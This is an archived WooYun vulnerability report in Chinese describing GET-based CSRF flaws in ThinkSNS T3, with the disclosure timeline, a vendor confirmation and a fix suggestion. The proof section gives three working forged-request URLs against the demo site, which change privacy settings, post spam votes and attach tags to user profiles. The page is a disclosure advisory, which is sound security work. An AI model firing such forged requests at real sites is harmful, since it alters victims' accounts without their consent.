当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-050389

漏洞标题:ThinkSNS多处GET型CSRF(打包)

相关厂商:ThinkSNS

漏洞作者: 我是小号

提交时间:2014-02-12 18:12

修复时间:2014-05-13 18:13

公开时间:2014-05-13 18:13

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-12: 细节已通知厂商并且等待厂商处理中
2014-02-19: 厂商已经确认,细节仅向厂商公开
2014-02-22: 细节向第三方安全合作伙伴开放
2014-04-15: 细节向核心白帽子及相关领域专家公开
2014-04-25: 细节向普通白帽子公开
2014-05-05: 细节向实习白帽子公开
2014-05-13: 细节向公众公开

简要描述:

ThinkSNS多处CSRF(GET型),可造成一定危害

详细说明:

就拿你们的演示站点做了测试(是T3的最新版本)

http://demo.thinksns.com/


------
ThinkSNS最新版本内对于POST请求的来源是进行了判断的

0.png


但是ThinkSNS最新版本对于POST和GET请求是不分的,而且GET请求的是可以在网站内用<img>标签发起的,将导致严重的安全问题,我就选取了一些发上来。

漏洞证明:

1)更改个人设置中的隐私设置(通过GET请求实现)

http://demo.thinksns.com/t3/index.php?app=public&mod=Account&act=doSavePrivacy&comment_weibo=1&message=1&space=1


2.png


2)发起大量垃圾投票(可刷分/通过GET请求实现):

http://demo.thinksns.com/t3/index.php?app=vote&mod=Index&act=add&date=7&opt%5B%5D=%E4%BD%A0%E5%B8%85&opt%5B%5D=%E6%88%91%E5%B8%85&title=%E7%8E%A9%E7%8E%A9&type=0


CSRF.png


3)可给任何用户加“傻X”(任意)标签,请求如下(通过GET请求实现)

http://demo.thinksns.com/t3/index.php?app=public&mod=Account&act=doSaveProfile&tag_num=5&user_tags=785


1.png

修复方案:

其实还有很多,我就不全部发上来了。所以重要的操作一定要区分POST和GET。

版权声明:转载请注明来源 我是小号@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-02-19 17:06

厂商回复:

多出细节,非常感谢!

最新状态:

暂无